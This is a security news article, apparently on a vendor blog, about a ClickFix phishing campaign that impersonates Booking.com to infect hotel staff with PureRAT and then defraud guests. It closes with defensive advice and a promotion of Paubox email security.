A phishing operation active since April 2025 is targeting hotel administrators to steal credentials and payment data using advanced social engineering and remote access malware.
According to The Hacker News, cybersecurity researchers have uncovered a widespread phishing campaign targeting the hospitality industry, using compromised email accounts to impersonate Booking.com and lure hotel staff into visiting ClickFix-style phishing pages. These pages deploy PureRAT malware to compromise systems and harvest administrator credentials for hotel booking platforms like Booking.com and Expedia.
The campaign, active since at least April 2025 and ongoing as of October, tries to gain access to hotel management systems and use them for further fraud, including directly contacting hotel guests to steal banking information. PureRAT, the malware used in the operation, allows full remote access and data exfiltration.
The phishing emails originate from compromised accounts and direct hotel staff to fake security challenge pages. These pages use JavaScript to manipulate the browser into loading a malicious PowerShell script. Victims unknowingly execute this script, which downloads and runs a ZIP archive containing malware. The malware persists on the system and installs PureRAT (also known as zgRAT) via DLL side-loading.
PureRAT is capable of webcam access, keystroke logging, data theft, and remote command execution. It is protected with .NET Reactor, a tool used to make reverse engineering more difficult. Once installed, the malware gives attackers full control over infected hotel systems.
In addition to targeting hotel staff, attackers also reach out to hotel customers via WhatsApp or email, referencing real reservation details and asking them to verify payment information. These messages link to fake booking sites crafted to steal card data.
Analysts tracking the campaign noted that attackers are obtaining hotel administrator details from criminal marketplaces, where access is either purchased directly or traded for a share of fraudulent profits. Malware distribution is often outsourced to traffers, individuals responsible for infecting targets with infostealers or remote access tools.
Researchers also observed threat actors selling authentication logs from various travel-related systems through messaging platforms. These logs are typically verified with automated tools that test credentials against live systems using proxy infrastructure.
Additional analysis of the attack chain found that newer iterations of the phishing pages now include embedded videos, real-time user counters, OS-specific guidance, and clipboard-manipulation features, all designed to increase credibility and reduce user hesitation.
The ClickFix operation shows how easily cybercriminals can turn everyday business platforms into launch points for large-scale fraud. Instead of relying only on fake Booking.com pages or brand lookalikes, attackers are taking over genuine hotel and travel accounts and using that access to push malware, steal credentials, and reach guests directly. When a message comes from a real account inside a familiar system, even cautious users struggle to spot the deception.
For hotels, where reservations, confirmations, and payment checks happen constantly, this creates an environment where a single compromised login can expose staff and customers to financial loss and data theft. The combination of social engineering, remote access malware, and credential resale forms a closed loop that keeps feeding new victims into the campaign.
In addition to steps like enforcing MFA, reducing admin privileges, and watching for unusual account activity, hotels can strengthen their email perimeter with Paubox Inbound Email Security. Its generative AI evaluates sender behavior, message context, and subtle impersonation cues to stop phishing attempts before they reach inboxes, even if the email comes from a legitimate but compromised business account. When paired with internal platform safeguards, it helps break the phishing chains that depend on trusted systems being misused as delivery vehicles.
ClickFix is a social engineering tactic that mimics legitimate login or verification processes, often with embedded videos or security prompts to convince users to run malicious commands on their systems.
PureRAT is a remote access trojan that enables full control of an infected machine, including keylogging, webcam access, file transfer, command execution, and data exfiltration.
Attackers use stolen administrator credentials to access hotel booking systems, then send WhatsApp messages or emails using real reservation details to trick guests into entering payment info on fake sites.
Traffers are cybercriminals who specialize in spreading malware to target machines. They often work under an affiliate model to infect systems in exchange for a share of the profits.